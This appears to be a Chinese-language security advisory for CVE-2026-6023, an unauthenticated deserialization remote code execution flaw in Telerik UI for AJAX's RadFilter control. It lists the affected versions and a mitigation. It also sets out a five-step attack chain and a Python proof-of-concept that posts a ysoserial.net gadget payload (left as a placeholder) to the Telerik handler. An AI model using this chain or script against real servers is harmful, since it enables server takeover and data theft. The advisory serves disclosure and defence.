IPBUF安全漏洞报告
English
CVE-2026-6023 CVSS 8.1 高危

CVE-2026-6023 Progress Telerik UI for AJAX 远程代码执行漏洞

披露日期: 2026-04-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6023
漏洞类型
不安全反序列化
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Progress Telerik UI for AJAX

相关标签

RCE不安全反序列化TelerikCVE-2026-6023ASP.NET

漏洞概述

Progress Telerik UI for AJAX 的 RadFilter 控件存在严重的不安全反序列化漏洞。在指定版本范围内,由于控件在恢复过滤器状态时未对客户端数据进行严格校验,远程攻击者可构造恶意的序列化数据并发送至服务器。服务器在处理该数据时将触发反序列化操作,导致在无需用户交互和认证的情况下执行任意代码,完全控制受影响的服务器系统。

技术细节

该漏洞源于 RadFilter 控件在处理视图状态或过滤器状态时的设计缺陷。攻击者利用 .NET 反序列化机制,通过工具(如 ysoserial.net)生成包含恶意 gadget 链的序列化对象。该对象被编码后作为 RadFilter 的状态参数发送。当服务器端接收到请求并尝试反序列化此状态以还原控件配置时,.NET 运行时会解析并实例化其中的对象,从而触发 gadget 链中的静态代码执行逻辑。由于 CVSS 向量显示攻击复杂度为高(AC:H),可能需要特定的配置或绕过某些保护机制,但一旦成功,影响范围极高(C:H/I:H/A:H)。

攻击链分析

STEP 1
侦察
扫描目标网络,识别使用 Progress Telerik UI for AJAX 的应用,并确认其版本号在受影响范围内。
STEP 2
武器化
使用 ysoserial.net 等工具,生成针对 .NET 反序列化的恶意 payload(如使用 ActivitySurrogateSelector gadget)。
STEP 3
投递
向目标服务器发送特制的 HTTP POST 请求,将恶意 payload 填入 RadFilter 控件的状态参数中。
STEP 4
利用
服务器端解析请求并反序列化 RadFilter 状态,触发恶意代码执行,从而获得服务器权限。
STEP 5
行动
攻击者建立后门连接,窃取数据或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://target-site/Telerik.Web.UI.WebResource.axd" # Generate payload using ysoserial.net # Command: ysoserial.exe -g ActivitySurrogateSelector -c "calc.exe" -f ObjectStateFormatter # Note: This requires a pre-generated payload string for the specific formatter used by Telerik. malicious_payload = "<PASTE_GENERATED_PAYLOAD_HERE>" # Data structure for RadFilter state (example structure) data = { "RadFilterState": malicious_payload } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=data, headers=headers) if response.status_code == 200: print("Payload sent successfully. Check for execution.") else: print(f"Server returned: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Progress Telerik UI for AJAX 2024.4.1114 至 2026.1.421

防御指南

临时缓解措施
若无法立即升级,请检查并禁用页面中 RadFilter 控件的功能,或配置 ASP.NET MachineKey 以启用 ViewState 加密和验证,确保所有客户端状态数据在服务器端处理前经过完整性校验。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表